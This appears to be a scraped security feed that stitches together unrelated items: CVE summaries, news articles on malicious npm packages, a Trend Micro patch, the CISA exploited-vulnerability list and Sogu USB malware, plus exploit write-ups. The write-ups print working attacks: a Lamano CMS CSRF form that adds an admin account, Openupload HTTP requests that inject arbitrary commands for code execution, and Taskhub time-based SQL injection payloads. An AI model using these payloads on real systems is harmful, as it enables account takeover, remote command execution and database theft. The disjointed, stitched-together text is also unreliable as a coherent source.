The `PaperCutNG Mobility Print` version 1.0.3512 application allows an

unauthenticated attacker to perform a CSRF attack on an instance

administrator to configure the clients host (in the "configure printer

discovery" section). This is possible because the application has no

protections against CSRF attacks, like Anti-CSRF tokens, header origin

validation, samesite cookies, etc.





CVE-2023-2508: Mobility Print release history | PaperCut

Lamano CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Lamano CMS v2.0 CSRF Vulnerability                                                                                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : http://www.lamano.lu/                                                                                              |    
| # Dork      :  © 2018 Lamano by easysolutions                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 8.

[+] Set the target site link Save changes and apply . 

[+] infected file : admin.php

[+] http://127.0.0.1/q73/admin.php .

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">

</tr>  
                    </table>  
                <br/><br/>  
        <form action="https://www.sylviebecker.127.0.0.1/lu/admin.php?action=add_user" method="POST">  
            <table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">  
                <tr>  
                    <td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>  
                </tr>  
                <tr>  
                    <td class="tah11" align="right">Nom d'utilisateur :</td>  
                    <td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>  
                </tr>  
                <tr>  
                    <td class="tah11" align="right">Mot de passe : </td>  
                    <td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>  
                </tr>  
                <tr>  
                    <td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>  
                </tr>  
            </table>  
        </form><br/><br/>  
<div>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Lamano CMS 2.0 Cross Site Request Forgery

Sensitive information disclosure due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40713.

CVE-2023-5042

Cybersecurity researchers have discovered a fresh batch of malicious packages in the npm package registry that are designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server.
Sonatype said it has discovered 14 different npm packages so far: @am-fe/hooks, @am-fe/provider, @am-fe/request, @am-fe/utils, @am-fe/watermark, @am-fe/watermark-core,

Kubernetes / Supply Chain Attack

Cybersecurity researchers have discovered a fresh batch of malicious packages in the npm package registry that are designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server.

Sonatype said it has discovered 14 different npm packages so far: @am-fe/hooks, @am-fe/provider, @am-fe/request, @am-fe/utils, @am-fe/watermark, @am-fe/watermark-core, @dynamic-form-components/mui, @dynamic-form-components/shineout, @expue/app, @fixedwidthtable/fixedwidthtable, @soc-fe/use, @spgy/eslint-plugin-spgy-fe, @virtualsearchtable/virtualsearchtable, and shineouts.

"These packages \[...\] attempt to impersonate JavaScript libraries and components, such as ESLint plugins and TypeScript SDK tools," the software supply chain security firm said. "But, upon installation, multiple versions of the packages were seen running obfuscated code to collect and siphon sensitive files from the target machine."

Along with Kubernetes config and SSH keys, the modules are also capable of harvesting system metadata such as username, IP address, and hostname, all of which are transmitted to a domain named app.threatest\[.\]com.

The disclosure comes a little over a week after Sonatype detected counterfeit npm packages that exploit a technique known as dependency confusion to impersonate internal packages purportedly used by PayPal Zettle and Airbnb developers as part of an ethical research experiment.

That said, threat actors continue to target open-source registries like npm and PyPI with cryptojackers, infostealers, and other novel malware to compromise developer systems and ultimately poison the software supply chain.

In one instance highlighted by Phylum earlier this month, an npm module named hardhat-gas-report remained benign for more than eight months since January 6, 2023, before receiving two back-to-back updates on September 1, 2023, to include malicious JavaScript capable of exfiltrating Ethereum private keys copied to the clipboard to a remote server.

"This targeted approach indicates a sophisticated understanding of cryptocurrency security and suggests that the attacker is aiming to capture and exfiltrate sensitive cryptographic keys for unauthorized access to Ethereum wallets or other secured digital assets," the company said.

UPCOMING WEBINAR

Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM

Stay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.

Supercharge Your Skills

Another case of an attempted supply chain attack involved a crafty npm package called gcc-patch that masquerades as a bespoke GCC compiler but actually harbors a cryptocurrency miner that "covertly taps into the computational power of innocent developers, aiming to profit at their expense."

What's more, such campaigns have diversified to span the Javascript (npm), Python (PyPI) and Ruby (RubyGems) ecosystems, what with threat actors uploading several packages with data collection and exfiltration capabilities and following it up by publishing new versions carrying malicious payloads.

The campaign specifically targets Apple macOS users, indicating that malware in open-source package repositories is not only becoming increasingly prevalent, but are also singling out other operating systems beyond Windows.

"The author of these packages is staging a broad campaign against software developers," Phylum noted in an analysis. "The end goal of this campaign remains unclear."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Fresh Wave of Malicious npm Packages Threaten Kubernetes Configs and SSH Keys

An issue was discovered in Croc through 9.6.5. The shared secret, located on a command line, can be read by local users who list all processes and their arguments.

CVE-2023-43621: security - croc: multiple issues in file sharing utility

Cybersecurity company Trend Micro has released patches and hotfixes to address a critical security flaw in Apex One and Worry-Free Business Security solutions for Windows that has been actively exploited in real-world attacks.
Tracked as CVE-2023-41179 (CVSS score: 9.1), it relates to a third-party antivirus uninstaller module that's bundled along with the software. The complete list of impacted

Cybersecurity company Trend Micro has released patches and hotfixes to address a critical security flaw in Apex One and Worry-Free Business Security solutions for Windows that has been actively exploited in real-world attacks.

Tracked as **CVE-2023-41179** (CVSS score: 9.1), it relates to a third-party antivirus uninstaller module that's bundled along with the software. The complete list of impacted products is as follows -

*   Apex One - version 2019 (on-premise), fixed in SP1 Patch 1 (B12380)
*   Apex One as a Service - fixed in SP1 Patch 1 (B12380) and Agent version 14.0.12637
*   Worry-Free Business Security - version 10.0 SP1, fixed in 10.0 SP1 Patch 2495
*   Worry-Free Business Security Services - fixed in July 31, 2023, Monthly Maintenance Release

Trend Micro said that a successful exploitation of the flaw could allow an attacker to manipulate the component to execute arbitrary commands on an affected installation. However, it requires that the adversary already has administrative console access on the target system.

The company also warned that it has "observed at least one active attempt of potential exploitation of this vulnerability in the wild," making it essential that users move quickly to apply the patches.

As a workaround, it's recommending that customers limit access to the product's administration console to trusted networks.

**CISA Adds Nine Flaws to KEV Catalog**

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added nine flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild -

*   **CVE-2014-8361** (CVSS score: N/A) - Realtek SDK Improper Input Validation Vulnerability
*   **CVE-2017-6884** (CVSS score: 8.8) - Zyxel EMG2926 Routers Command Injection Vulnerability
*   **CVE-2021-3129** (CVSS score: 9.8) - Laravel Ignition File Upload Vulnerability
*   **CVE-2022-22265** (CVSS score: 7.8) - Samsung Mobile Devices Use-After-Free Vulnerability
*   **CVE-2022-31459** (CVSS score: 6.5) - Owl Labs Meeting Owl Inadequate Encryption Strength Vulnerability
*   **CVE-2022-31461** (CVSS score: 6.5) - Owl Labs Meeting Owl Missing Authentication for Critical Function Vulnerability
*   **CVE-2022-31462** (CVSS score: 8.8) - Owl Labs Meeting Owl Use of Hard-coded Credentials Vulnerability
*   **CVE-2022-31463** (CVSS score: 7.1) - Owl Labs Meeting Owl Improper Authentication Vulnerability
*   **CVE-2023-28434** (CVSS score: 8.8) - MinIO Security Feature Bypass Vulnerability

It's worth noting that a fifth flaw impacting Owl Labs Meeting Owl (CVE-2022-31460, CVSS score: 7.4), a case of hard-coded credentials, was previously added to the KEV catalog on June 8, 2022, merely days after Modzero disclosed details of the flaws.

UPCOMING WEBINAR

Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM

Stay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.

Supercharge Your Skills

"By exploiting the vulnerabilities\[...\], an attacker can find registered devices, their data, and owners from around the world," the Swiss security consultancy firm said at the time.

"Attackers can also access confidential screenshots of whiteboards or use the Owl to get access to the owner's network. The PIN protection, which protects the Owl from unauthorized use, can be circumvented by an attacker by (at least) four different approaches."

Even more troublingly, the devices can be turned into rogue wireless network gateways to a local corporate network remotely via Bluetooth by arbitrary users and can be abused to act as a backdoor to owners' local networks. It's currently not known how these vulnerabilities are exploited in the wild.

The security weakness impacting MinIO has come under abuse in recent months, with Security Joes revealing this month that an unnamed threat actor is exploiting it in conjunction with CVE-2023-28432 (CVSS score: 7.5) to achieve unauthorized code execution on susceptible servers and drop follow-on payloads.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Trend Micro Releases Urgent Fix for Actively Exploited Critical Security Vulnerability

File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.

**CVE-2023-36319**

By modifying the compression plug-in command, the attacker can cause the server to execute arbitrary commands during the upload process.

**Only used for authorized security testing, please do not use it for illegal purposes. Violations have nothing to do with the author.**

**Affected version:**

openupload Stable version 0.4.3

**Step one**

Log in to the backend and click on the function: Administration ->Plugins ->compress

Add new “command” directive and save:

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 183
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=adminpluginsoptions&step=4&id=compress&gid=admins&command=<YOUR CMD>&extension=&compression=
    

**Step two**

Enter the "File upload" function, upload a random file, and ensure "compress=0" in the parameters.

    POST /index.php HTTP/1.1
    Host: www.test.com
    Content-Length: 53
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    action=u&step=3&description=123&emailme=no&compress=0
    

The commands we write will be executed normally.

CVE-2023-36319: GitHub - Lowalu/CVE-2023-36319: exp4CVE-2023-36319

An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2, allows local attackers to cause a denial of service (DoS).

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2020-24089: GitHub - rjt-gupta/CVE-2020-24089: Windows Privilege Escalation: IOBit Malware Fighter v8.0.2

Taskhub version 2.8.7 suffers from a remote SQL injection vulnerability.

    # Exploit Title: taskhub 2.8.7 - SQL Injection# Exploit Author: CraCkEr# Date: 05/09/2023# Vendor: Infinitie Technologies# Vendor Homepage: https://www.infinitietech.com/# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874# Demo: https://taskhub.company/auth# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4987# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /home/get_tasks_listGET parameter 'project' is vulnerable to SQL InjectionGET parameter 'status' is vulnerable to SQL InjectionGET parameter 'user_id' is vulnerable to SQL InjectionGET parameter 'sort' is vulnerable to SQL InjectionGET parameter 'search' is vulnerable to SQL Injectionhttps://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]---Parameter: project (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: status (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: user_id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: sort (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=Parameter: search (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW---[-] Done

Taskhub 2.8.7 SQL Injection

Security researchers found USB-based Sogu espionage malware spreading within African operations of European and US firms.

For much of the cybersecurity industry, malware spread via USB drives represents the quaint hacker threat of the past decade—or the one before that. But a group of China-backed spies appears to have figured out that global organizations with staff in developing countries still keep one foot in the technological past, where thumb drives are passed around like business cards and internet cafés are far from extinct. Over the past year, those espionage-focused hackers have exploited this geographic time warp to bring retro USB malware back to dozens of victims’ networks.

At the mWise security conference today, researchers from cybersecurity firm Mandiant revealed that a China-linked hacker group they’re calling UNC53 has managed to hack at least 29 organizations around the world since the beginning of last year using the old-school approach of tricking their staff into plugging malware-infected USB drives into computers on their networks. While those victims span the United States, Europe, and Asia, Mandiant says many of the infections appear to originate from multinational organizations’ Africa-based operations, in countries including Egypt, Zimbabwe, Tanzania, Kenya, Ghana, and Madagascar. In some cases, the malware—in fact, several variants of a more than decade-old strain known as Sogu—appears to have traveled via USB stick from shared computers in print shops and internet cafés, indiscriminately infecting computers in a widespread data dragnet.

Mandiant researchers say the campaign represents a surprisingly effective revival of thumb drive-based hacking that has largely been replaced by more modern techniques, like phishing and remote exploitation of software vulnerabilities. “USB infections are back,” says Mandiant researcher Brendan McKeague. “In today’s globally distributed economy, an organization may be headquartered in Europe, but they have remote workers in regions of the world like Africa. In multiple instances, places like Ghana or Zimbabwe were the infection point for these USB-based intrusions.”

The malware Mandiant found, known as Sogu or sometimes Korplug or PlugX, has been used in non-USB forms by a broad array of largely China-based hacking groups for well over a decade. The remote-access trojan showed up, for instance, in China’s notorious breach of the US Office of Personnel Management in 2015, and the Cybersecurity and Infrastructure Security Agency warned about it being used again in a broad espionage campaign in 2017. But in January of 2022, Mandiant began to see new versions of the trojan repeatedly showing up in incident response investigations, and each time it traced those breaches to Sogu-infected USB thumb drives.

Since then, Mandiant has watched that USB-hacking campaign ramp up and infect new victims as recently as this month, stretching across consulting, marketing, engineering, construction, mining, education, banking, and pharmaceuticals, as well as government agencies. Mandiant found that in many cases the infection had been picked up from a shared computer at an internet café or print shop, spreading from machines like a publicly accessible internet-access terminal at the Robert Mugabe Airport in Harare, Zimbabwe. “That’s an interesting case if UNC53’s intended infection point is a place where people are traveling regionally throughout Africa or even possibly spreading this infection internationally outside of Africa,” says Mandiant researcher Ray Leong.

Leong notes that Mandiant couldn’t determine whether any such location was an intentional infection point or “just another stop along the way as this campaign was propagating throughout a particular region.” It also wasn’t entirely clear whether the hackers sought to use their access to a multinational’s operations in Africa to target the company’s European or US operations. In some cases at least, it appeared that the spies were focused on the African operations themselves, given China’s strategic and economic interest in the continent.

The new Sogu campaign’s method of spreading USB infections might seem a particularly indiscriminate way to conduct espionage. But, like the software supply chain attacks or watering hole attacks that Chinese state-sponsored spies have repeatedly carried out, this approach may allow the hackers to cast a wide net and sort through their victims for specific high-value targets, McKeague and Leong suggest. They also argue that it means the hackers behind the campaign likely have significant human resources to “sort and triage” the data they steal from those victims to find useful intelligence.

The Sogu USB malware uses a series of simple but clever tricks to infect machines and steal their data, including in some cases even accessing “air-gapped” computers with no internet connection. When an infected USB drive is inserted into a system, it doesn’t automatically run, given that most modern Windows machines have autorun disabled by default for USB devices. Instead, it tries to trick users into running an executable file on the drive by naming that file after the drive itself or, if the drive has no name, the more generic “removable media”—a ruse designed to fool the user into unthinkingly clicking the file when they attempt to open the drive. The Sogu malware then copies itself onto a hidden folder on the machine.

On a normal internet-connected computer, the malware beacons to a command-and-control server, then starts accepting commands to search the victim machine or upload its data to that remote server. It also copies itself to any other USB drive inserted into the PC to continue its machine-to-machine spread. If one variant of the Sogu USB malware instead finds itself on an air-gapped computer, it first attempts to turn on the victim’s Wi-Fi adapter and connect to local networks. If that fails, it puts stolen data in a folder on the infected USB drive itself, storing it there until it’s plugged into an internet-connected machine where the stolen data can be sent to the command-and-control server.

Sogu’s focus on espionage and the relatively high number of USB-based infections is a rare sight in 2023. Its USB propagation is more reminiscent of tools like the NSA-created Flame malware that was discovered targeting air-gapped systems in 2012, or even the Russian Agent.btz malware that was found inside Pentagon networks in 2008.

Surprisingly, however, the Sogu campaign is just part of a broader resurgence of USB malware that Mandiant has spotted in recent years, the researchers say. In 2022, for instance, they saw a massive spike in infections from a piece of cybercrime-focused USB malware known as Raspberry Robin. And just this year, they spotted another strain of USB-based espionage malware known as Snowydrive being used in seven network intrusions.

All of this, McKeague and Leong argue, means that network defenders shouldn’t fool themselves into thinking that USB infections are a solved problem—particularly in global networks that include operations in developing countries. They should be aware that state-sponsored hackers are carrying out active espionage campaigns via those USB sticks. “In North America and Europe, we think this is an old infection vector that’s been locked down,” Leong says. “But there are exposures in this other geography that are being targeted. It’s still relevant, and it’s still being exploited.”

Tag

#windows